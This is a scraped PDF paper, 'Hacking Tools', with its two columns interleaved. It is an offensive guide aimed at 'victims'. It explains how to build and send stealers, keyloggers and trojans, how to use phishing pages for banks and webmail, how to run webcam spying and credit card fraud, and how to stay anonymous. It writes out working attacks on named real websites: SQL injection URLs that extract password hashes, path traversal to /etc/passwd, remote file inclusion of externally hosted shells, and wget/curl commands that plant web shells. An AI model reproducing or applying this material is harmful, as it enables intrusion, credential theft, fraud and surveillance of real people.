Get documents about "HACKING TOOLS
W
Description
hacking-computers pdf
Document Sample
HACKING TOOLS
Dr. Hedaya Alasooly
Ministry of Telecom. and Inform. Tech., Palestine
hasooly@gov.ps
ABSTRACT There is an important course in Hacking, called
In this paper, I would like to put some of my knowledge Certified Ethical Hacking. I advice you to go through it.
in hacking. The paper talks about many of the hacking The course covers the following modules
tools and strategies existing today and covers mainly Module I: Introduction to Ethical Hacking
the following: Certified Ethical Hacking Course, Module II: Footprinting
Stealers, Keyloggers, Trojans, Web Downloaders, Module III: Scanning
Sending the patch to the victim, Fake pages pages, Module IV: Enumeration
Some other sites fake pages, Using anonymous email, Module V: System Hacking
Hacking remote computer, Scanners, Email read Module VI: Trojans and Backdoors
notification and finding the email address of email Module VII: Sniffers
sender, Checking Yahoo and MSN block and delete, Module VIII: Denial of Service
Opening the webcam without the person permission, Module IX: Social Engineering
Email read notification and finding the ip address of Module X: Session Hijacking
email sender, Using anonymous proxy, Finding Module XI: Hacking Web Servers
information about remote system, Using anonymous Module XII: Web Application Vulnerabilities
proxy, The credit card hacking, Scanning the website Module XIII: Web Based Password Cracking
with vulnerability security scanners and getting the Techniques
suitable exploits, Some examples attacking websites and Module XIV: SQL Injection
using the exploits. for hacking emails, Some other sites Module XV: Hacking Wireless Networks
fake Module XVI: Viruses
Module XVII: Physical Security
Keywords: Certified ethical hacking, Trojans, Fake Module XVIII: Linux Hacking
pages, Scanners, Hacking web sites. Module XIX: Evading IDS, Firewalls and Honey pots
Module XX: Buffer Overflows
1. INTRODUCTION Module XXI: Cryptography
In this paper, I would like to put some of my knowledge Module XXII: Penetration Testing
in hacking. The paper talks about many of the hacking The course covers a lot of important lessons and
tools and strategies existing today and covers mainly tools regarding hacking. You can find the course
the following: Certified Ethical Hacking Course, material in the web site
Stealers, Keyloggers, Trojans, Web Downloaders, http://www.hackerz.ir/tools/ceh
Sending the patch to the victim, Fake pages for hacking http://www.hackerz.ir/tools
emails, Some other sites fake pages, Some other sites http://www.hackerz.ir/e-books
fake pages, Using anonymous email, Hacking remote http://www.alm3refh.com/vb/t14377.html
computer, Scanners, Email read notification and finding There is also a good book to teach you how to hack
the email address of email sender, Checking Yahoo and the websites, called sites under attack.
MSN block and delete, Opening the webcam without
the person permission, Email read notification and 3. STEALERS
finding the ip address of email sender, Using There are some of programs that steal the passwords
anonymous proxy, Finding information about remote and important information from the computer and send
system, Using anonymous proxy, The credit card them to your predefined email address, and those are
hacking, Scanning the website with vulnerability called stealers. I tried ProAgentV1.2 and HermanAgent
security scanners and getting the suitable exploits, v1.0.rar and I found they are good, to notify you with
Some examples attacking websites and using the the information. You can download them from
exploits. http://www.trojanfrance.com/index.php?dir=Stealer/
Note, all the internet links, especially under the site Through the stealer editor you will create the server
www.2shared.com, we working when the paper is file, you shall configure it to notify you to your email
written, but the files maybe removed from the server address. ProAgent can bind it with another file and
later, so you can download any of the mentioned tool by change the icon for it, and what I think it encrypts it
searching for it in google. also. But with the Herman agent you will need to use
some other jointer to bind it with the created server and
2. CERTIFIED ETHICAL HACKING change the icon for the created server. You can use
COURSE. microjointer or any suitable program from
http://www.trojanfrance.com/index.php?dir=Binders/ • http://www.speedyshare.com/
• ttp://www.4shared.com/
4. KEYLOGGERS • www.tripod.lycos.co.uk
These are tools that can log whatever the victim writes • http://rapidshare.com
and send information to some email address. I just • http://www.zshare.net
tested IRAQSPY Keylogger and SC-KeyLog v2.24.exe For example, you can look at my created servers in
and I found them are fine. You can find a lot of http://members.lycos.co.uk/newuserxyz/mypics.zip
KeyLoggers in here are four patched in mypics.zip: ProAgent agent,
http://www.trojanfrance.com/index.php?dir=KeyLogger Herman agent, IRAQSPY Keylogger, and SC-KeyLog.
s/ You can use http://notlong.com for encrypting any file
Regarding IRAQSPY Keylogger can be found in
http://www.speedyshare.com/227662558.html 8. FAKE PAGES FOR HACKING
You shall configure the key logger to notify you to
your email address. Then you will need to use some
EMAILS
Another way to hack the email, is to use fake pages,
jointer to bind the created server with some file and
and ask your victim to logon through the fake page by
change the icon for it. You can use microjointer or any
some trick, which is programmed to send the user email
suitable program from
and password to your email address. There are some
http://www.trojanfrance.com/index.php?dir=Binders/
programs that can create yahoo and hotmail and gmail
fake pages. For example, Bazoka and W@B Shark v.1
5. TROJANS can be used. Bazoka v.3 is used to develop fake msn
These are programs to totally spy whatever being done messenger. Most of such programs exist in
in the victim computer. In most programs, you will need http://www.khayma.com/koonooz/programs.html.
to create the server after configuring it to operate in Another easier way is to look for existing fake yahoo
some port address, and notify you in your email address and hotmail pages designed by the others other, and
or other ways, mostly exists Proconnective notification change the email address in the page source code to
which support reverse connection, Mail notification, your email address. The best of what I found during my
ICQ pager notification, CGI notification. When the search for yahoo and hotmail fake pages, You can
server is executed in the remote computer it will notify download them from here and change the email address
you through email the name and local IP address of the http://www.2shared.com/file/3309191/469bf976/email-
victim computer and the status of the server each time fake-pages.html
the victim is online, information.
You can find a lot of Trojans in
http://www.trojanfrance.com/index.php?dir=Trojans/
9. SOME OTHER SITES FAKE PAGES
There are a lot of fake pages for other sites. For
I just worked with Optix and Prorat, which are
example, here is the fake pages for Paypal, Bank of
widely used. The IP received is the local IP address. I
Oklahoma, Chase, Deutsche Bank, Epass, Fake hotmail
got problem with notification with Subseven Gold. So I
login, Hi5, Bank of Israel, Online Banking, Western
leave it to your own trial.
Union, usa.visa.com, America Online Billing Center,
Ebay.com. Just change the email address in the source
6. WEB DOWNLOADERS html code to your email address
Some of the hackers prefer instead of binding big size http://www.2shared.com/file/3309071/d9dabecf/fake-
of the patch with an image file, which will become pages.html
suspicious to the victim, they prefer to bind the image
file with downloader server which downloads the patch
from some site
10. USING ANONYMOUS EMAIL
You need to send to the victim an email address with
For example, you can configure the downloader to
your files or links. It is always better to send
download the patch from
anonymous email so your Ip address can't be tracked,.
http://members.lycos.co.uk/newuserxyz/mypics.zip
There are some programs to send anonymous email, and
Then the created downloader server can be binded
I succeeded to use them to send email to my email in
with any file. and sent to the victim. There are a lot of
webmail.gov.ps, but I could not use them to send email
downloaders in
to Yahoo or Hothmail as it seems they have security
http://www.trojanfrance.com/index.php?dir=WebDownl
restrictions. Such programs are, Kaboom2 and grade.
oaders/
You can download them from
http://www.2shared.com/file/3217179/c020d1ec/anony
7. SENDING THE PATCH TO THE mousemail.html
VICTIM There are some sites that you can send through the
Now after the server is created and binded with another anonymous emails, i.e.,
file and you changed the icon for it, you can send it to http://cyberatlantis.com/anonymous_email.php
the victim. As the email systems don’t allow attaching www.sendanonymousemail.net
exe files to be sent, you can put it in some site for file http://www.willselfdestruct.com/secure/submit
sharing, the best of them http://www.sharpmail.co.uk/
• www.2shared.com
11. HACKING REMOTE COMPUTER and you will get a message when the email is read and
To enter to some share in the remote computer, you will details about the remote computer IP
write in the dos shell
# Net use \\192.168.1.25 /user:administrator 16. USING ANONYMOUS PROXY
# Net use For the hacker, it is always necessary he works through
# Net use Z:\\192,165.1.25\c$ anonymous proxy. I advice to use one of the current
Then you can see the Z drive which influence the c$ working proxy server
share http://www.ip-adress.com/Proxy_Checker/
12 SCANNERS 17. PATCHING THE WEB PAGE
There a lot of scanners that can scan for a range of I just read about patching the web pages, so when the
computers with certain open ports. Most widely used is victim go through it the patch will be started. But the
superscanner. In addition to vulnerability tools like GFI method did not wok with me, as the method is utilizing
and Nessus. I just saw very nice scanner that will search some vulnerability in Windows before Windows XP, so
for certain open ports with an IP range in some country it may work in windows up to windows 2000, not
called AsbMay_Scan. AsbMay-ProRa-Cash can be use tested. The method use the program Godwill or the
to break the password of the patch. You can download program noob to bind a web page with a patch. Such
many of the AsbMay tools from programs can be found in
http://www.2shared.com/file/3217530/da990490/Asb- http://www.2shared.com/file/3310016/518cead0/patch-
May.html webpage.html
In order to check the remote system for vulnerability, 18. THE CREDIT CARD HACKING
you can use GFI LanGuard, Nessus, Shadow Security In some hacking sites you can find some given credit
Scanner, Cgi Scanner, Microsoft Baseline Security cards information that you can use, but most of the are
Analyzer, N-Stealth. not good. There are some credit card generators that
generate credit card numbers but without CCV or
13 CHECKING YAHOO AND MSN expired date. So it is still not easy thing to get working
BLOCK AND DELETE credit card number. You can test the credit card if it is
Sometimes we want to check if someone made for us valid one from
delete or block in MSN and Yahoo. The best thing is to wallet.yahoo.com
use the site https://usa.visa.com/personal/security/vbv/index.html
http://www.blockstatus.com/msn/stchecker This site can generate the CVV number
which provides information about MSN Status Checker http://maling.freehostia.com/tools/cvv.php?SID=1ac33d
and Delete Checker, Yahoo status Checker and AIM ad41b7c05c5911985176e83438&USER_IP=d42699e2
Status Checker and ICQ Status Checker. There are &PHPSESSID=1ac33dad41b7c05c5911985176e83438
some other sites. You can also use the program aMSN
messenger to check if any person deleted you. 19. FINDING INFORMATION ABOUT
REMOTE SYSTEM
14 OPENING THE WEBCAM WITHOUT You can use some sites to gather information about the
THE PERSON PERMISSION remote server, if the type of operating system it uses,
I just went through some topics saying it is possible to and some information about the server administrator.
open the webcam without the messenger user Some of the useful sites:
permission, but I did not find a suitable program for http://www.netcraft.com/
that. Here are some programs and you can test them. http://www.dns411.com/
The programs are Camera Stealer, Cam Looka, yahoo http://whois.webhosting.info
see, Cammer.
http://www.2shared.com/file/3309777/35f60d7f/camera 20. SCANNING THE WEBSITE WITH
-programs.html VULNERABILITY SECURITY
In Google, just you can put inurl:/view/index.shtml SCANNERS AND GETTING THE
and you can see most of the opened cams in the world.
SUITABLE EXPLOITS
After getting information about the remote system and
15. EMAIL READ NOTIFICATION AND scanning it, you can know the exploits that can be
FINDING THE IP ADDRESS OF EMAIL utilized on that website from this site
SENDER www.milw0rm.com
To find the sender email address, is to copy the full When attacking a website, the first step to do is to try
header of the email and paste it in the site to find the security holes in the web site. For me, I
http://www.ip-adress.com/trace_email/ found that JAAScois scanner is one of the best ones that
To get email read notification, you can register in the can be used to discover security holes in the web site.
sites: www.readnotify.com and www.mailtracking.com, Other tools are, Shadow Security Scanner, N-stealth,
Lan-Guard, Nessus, Omran security scanner
After that the shell name become shell.php, we ask
After you find the security holes in some web site, you for it from browser and we can apply any command to
can use the website http://www.milw0rm.com to get the the server through that shell. By that we utilized one of
exploits and apply them the security holes in the website powered by 3.0.4 and
we uploaded a shell to that website. By the same way
21. SOME SITES TO DECRYPT you can utilize the security holes in 4images script or
PASSWORDS guestbook script or any other scripts in the website
There are some sites that can be used to decrypt hashes
for you, here are some of them, 22.2. EXAMPLE 2: ATTACKING WEBSITE
http://us.md5.crysm.net WITH REMOTE COMMAND EXECUTION
http://md5.rednoize.com SECURITY HOLE
http://ice.breaker.free.fr There are 3 security holes that allow for you to upload
http://shm.hard-core.pl/md5/ shell to the web site: Remote command execution ,
http://www.hashchecker.com Remote File Inclusion and Framework
http://lasecwww.epfl.ch/%7Eoechslin/projects/ophcrack Let see, Probe.cgi Remote Command Execution. The
http://md5.benramsey.com file pobe.cgi has security hole called Remote Command
http://md5.altervista.org Execution. You can find in the source code of the
http://shm.hard-core.pl exploit
http://plain-text.info o Proof of concept:
http://hackerscity.free.fr/index.php http://the-vuln.site.org/cgi-bin/probe.cgi?olddat=|id
http://www.hashchecker.com We search in Google, like that, allinurl:probe.cgi.,
http://passcracking.com and we get for example,
http://gdataonline.com/seekhash.php http://www./???.com/cgi.bin/probe.cgi?grid=ThaiGrid
http://www.milw0rm.com/md5/insert.php If we put |id|., we browse for example
http://md5.rednoize.com ww.???.com/cgi.bin/probe.cgi?grid=|id|, we get for
http://passcracking.com/ example, uid=99(www) gid=99(www)
If you put pwd instead,
22. SOME EXAMPLES FOR www.???.com/cgi.bin/probe.cgi?grid=|pwd|, we get,
/home/.???/cgi.bin. We want to return back one
ATTACKING WEBSITES AND USING
directory and see the permission in that directory
THE EXPLOITS www.???.com/cgi.bin/probe.cgi?grid=|cd
22.1. EXAMPLE 1: ATTACKING WEBSITE /home/.???/;ls%20-al|
POWERED BY VBULLETIN 3.04 We see which directory has a permission
For example, website that we can apply this exploit on drwxrwxrwx so we upload a shell on it, i.e., it was
it uploads. Now we change to that directory and upload
http://www.milw0rm.com/exploits/818 the shell r57shell.zip
The exploit code not written in Perl or Php, but it is www.???.com/cgi.bin/probe.cgi?grid=|cd
written directly, /home/.???/uploads/wget www.XXX.com/r57shell.zip*|
http://site/forumdisplay.php?GLOBALS[]=1&f=2&com To unzip the shell
ma=".system('id')." www.???.com/cgi.bin/probe.cgi?grid=|cd
We write instead of site, the website that has such /home/.???/uploads/unzip r57shell.zip*|
hole and we wish to attack it. We put instead of id, the You can now use the shall by browsing
Linux command we want to apply it in the server. In www.???.com/uploads/r57shell.php
case of id, we get for example, uid=100(apache)
gid=500(apache) groups=500(apache) 22.3. EXAMPLE 3: EXPLOITING
In case of putting pwd, we get the directory we are COMMAND EXECUTION SECURITY HOLE
on it in the server, i.e., As an example, the security hole in the script TECH-
home/domains/admin.com/public_html/vb NOTE.
You can use the command ls –al to see the folders, To search for that script in google, write inurl:/cgi-
and which folder has a permission drwxrwxrwx, and we bin/technote. For exploiting it, we add
have to enter it by cd command, i.e. data directory. main.cgi?down_num=5466654&board=rebarz99&com
After entering you download the shell to it mand=down_load&filename=rb9.txt|id|
cd home/domains/admin.com/public_html/vb/data;wget For example it becomes,
http://members.com/shell.zip;ls -al http://www.loveject.com/cgi-
Or you can use the commands curl or get or lynx bin/technote/main.cgi?down_num=5466654&board=reb
curl -o shell.zip www.members.com/shell.zip arz99&command=down_load&filename=rb9.txt|id|
GET www.members.com/shell.zip > shell.zip Other Linux commands you can use, |ls -la|, |pwd|
lynx -source www.members.com/shell.zip > shell.zip
You can unzip the file using the command unzip 22.4. EXAMPLE 4: UTILIZING SQL
cd
INJECTION SECURITY HOLE
home/domains/admin.com/public_html/vb/data;unzip
shell.zip;ls –al
The SQL injection security holes allow you to inject Unzip it and put its folder in C. Then we bring the
commands to get information from the SQL database exploit written in Php and paste it in the notepad with
and modify them, like usernames and passwords. the extension php, i.e. exploit.php. We put exploit.php
Exploiting such holes means that you will be able to in the folder C:\bamcomplie, then we write
read a file or write a database file. Lets see, that exploit bamcompile.exe exploit.php, we will get exploit.exe,
http://milw0rm.com/exploits/4138 run it from DOS and you will get the way to utilize it.
It is in the file AV Arcade 2.1b. To search for For example, the exploit
infected website with that hole, write in google http://www.milw0rm.com/exploits/2487. Save it as
"Powered by AV Arcade 2.1b". Utilizing the security 4images.php in C:\bamcomplie. Then from the DOS
hole, by adding write
/index.php?task=view_page&id=- bamcompile.exe 4images.php
1%20UNION%20SELECT%201,username,password% You will get a file 4images.exe. When you run
20FROM%20ava_users%20WHERE%20id=1 4images.exe you will get how you utilize it, for example
We look for infected website, and we apply the php 4images.php glynncountydemocraticparty.org
exploit, i.e, /4images/ -d
http://www.b9m.net//index.php?task=view_page&id=- php 4images.php glynncountydemocraticparty.org
1%20UNION%20SELECT%201,username,password% /4images/ 4images_ 1 2
20FROM%20ava_users%20WHERE%20id=1 Now we can use it, i.e. for
We get the username: HEX KSA, Password, glynncountydemocraticparty.org
21232f297a57a5a743894a0e4a801fc3 The result: Outputted Hash:
You can decrypt the password in any of the previous 7d37c580f9c36fa004af865448a6e278
sites or with John program You can decrypt it. You can use the program
AppServ to compile the Php code instead of
22.5. EXAMPLE 5: UTILIZING REMOTE bamcompile.exe. You can download it from
FILE DISCLOSURE SECURITY HOLE http://prdownloads.sourceforge.net/appserv/appserv-
We can utilize such security holes to read important win32-2.5.9.exe?download
files in the server, i.e, in the script USP FOSS
Distribution 22.8. EXAMPLE 8 USING THE EXPLOIT
http://www.milw0rm.com/exploits/3794 WRITTEN IN PERL
As an example, to apply the exploit in the infected You will need to download the program ActivePerl.
site http://riemann.usp.ac.fj/~uspfoss to read passwd file Here example how to utilize the hole in the perl script
http://riemann.usp.ac.fj/~uspfoss/user/download.php?dn EQdkp 1.3.2. The exploit is
ld=../../../../../../etc/passwd http://www.milw0rm.com/exploits/4030
We make copy and paste for that exploit and save it
22.6 EXAMPLE 6: UTILIZING REMOTE FILE with .pl extension, file name for example test.pl. Then
INCLUSION VULNERABILITY in DOS, we write perl test.pl. The utilization i.e.
Remote file inclusion security holes allow that we add w4ck1ng_eqdkp.pl [PATH]
php code to the server, an example for such security You can test it to hack the website
holes dkp.fluffigemammuts.org
http://www.milw0rm.com/exploits/4221 Test.pl dkp.fluffigemammuts.org
dork:inurl:index.php%"Submit%Articles"%"Member%
Login"%"Top%Authors" 22.9. EXAMPLE 9: USING THE EXPLOIT
dork:inurl:index.php?pagedb=rss WRITTEN IN C++
expl:index.php?page=shell? The exploits that work in windows and written in C
For example starts with that
http://ulusal.by.ru/r57.txt #include <wchar.h>
http://www.article- #include <stdio.h>
hut.com/index.php?page=http://ulusal.by.ru/r57.txt? #include <winsock.h>
#include <windows.h>
22.7. EXAMPLE 7: USING THE EXPLOIT The exploits that work in linux and written in C
WRITTEN IN PHP starts with that
There are some normal holes, so we find in the exploit #include <netinet/in.h>
the dork and the way to utilize the security hole directly. #include <netinet/udp.h>
But there are some holes, their exploits used some #include <sys/socket.h>
programming language to utilize them. Here you will #include <sys/types.h>
compile the exploit written in Php and then utilize it. We can use the program DEV compiler or CYGEN
You need to download the program bamcompile to make compile for the exploits written in C. CYGEN
http://www.bambalam.se/bamcompile/download/bamco can be download from cygwin.com
mpile1.21.zip You must save the C exploit in a file with extension
C. Then we compile the file with the command
gcc exploit.c -o exploit.exe
We get the columns,
We get the file exploit.exe, run it and you will get the 4 Id, 6 name, 9 email, 3 country, 5 Comment, 1 ip, 10
way to utilize the security hole date, 11Active or not
Make connection to database
22.10. EXAMPLE 10: USING THE EXPLOIT http://shiamedia.com/play.php?linkid=-
WRITTEN IN HTML 2242+union+select+1,2,3,4,5,6,7,8,9,10,11+from+all_g
We will apply on this exploit, book
http://www.milw0rm.com/exploits/3818 This will show you the results
This security hole exists in the script the merchant http://shiamedia.com/play.php?linkid=-
2.2.0. We copy and paste the exploit and save it in html 2242+union+select+ip,2,country,id,comment,name,7,8,
file, i.e, exploit.html, and we change the shell link only email,date,active+from+all_gbook
Then we open exploit.html and we put in the box the
site that has such security hole and we will be 23. CONCLUSION:
transferred to the shell on that site. Note in the html The paper talked about many of the hacking tools and
code, has the following parameters strategies existing today and covered mainly the
The directory that includes the script code: help following: Certified Ethical Hacking Course, Stealers,
The script that has the security hole: index.php Keyloggers, Trojans, Web Downloaders, Sending the
The hole variable: show= patch to the victim, Fake pages for hacking emails,
The shell: http://casavie.net/hack/r57.txt Some other sites fake pages, Some other sites fake
You can go directly to the shell by browsing for pages, Using anonymous email, Hacking remote
example computer, Scanners, Email read notification and finding
http://the- the email address of email sender, Checking Yahoo and
merchant.org/help/index.php?show=http://casavie.net/h MSN block and delete, Opening the webcam without
ack/r57.txt the person permission, Email read notification and
finding the ip address of email sender, Using
22.11. EXAMPLE 11: EXAMPLE ON SQL anonymous proxy, Finding information about remote
INJECTION VULNERABILITY system, Using anonymous proxy, The credit card
This is just general simple example, the script infected hacking, Scanning the website with vulnerability
with sql injection is play.php in some site the, link security scanners and getting the suitable exploits,
http://shiamedia.com/play.php?linkid=2242 Some examples for attacking websites and using the
We note that when the number more than 11 the web exploits.
page become blank using this link
http://shiamedia.com/play.php?linkid=2242+order+by+ 24. REFERENCES:
11 [1] http://www.pal-hack.com website.
Make the connection to database [2] http://www.xp10.cc/xp10/ website
http://shiamedia.com/play.php?linkid=- [3] http://www.youtue.com website
2242+union+select+1,2,3,4,5,6,7,8,9,10,11 [4] http://www.hackerz.ir/tools/ceh website
To know the database name [3] www.3asfh.net/vb/ website
http://shiamedia.com/play.php?linkid=-
2242+union+select+1,2,3,4,5,database(),7,8,9,10,11
Database name=iv. To know the user name and the
server name
http://shiamedia.com/play.php?linkid=-
2242+union+select+1,2,3,4,5,user(),7,8,9,10,11
User name: myshia@localhost. To know the SQL
version
http://shiamedia.com/play.php?linkid=-
2242+union+select+1,2,3,4,5,version(),7,8,9,10,11
To know all the tables
http://shiamedia.com/play.php?linkid=-
2242+union+select+1,2,3,4,5,concat_ws(0x3a3a,table_s
chema,table_name),7,8,9,10,11+from+information_sch
ema.tables
We get for example, iv::all_gbook. The database
name iv, and the table name all gbook. To get all the
columns in that table, we write
http://shiamedia.com/play.php?linkid=-
2242+union+select+1,2,3,4,5,column_name,7,8,9,10,11
+from+information_schema.columns+where+table_na
me="all_gbook"
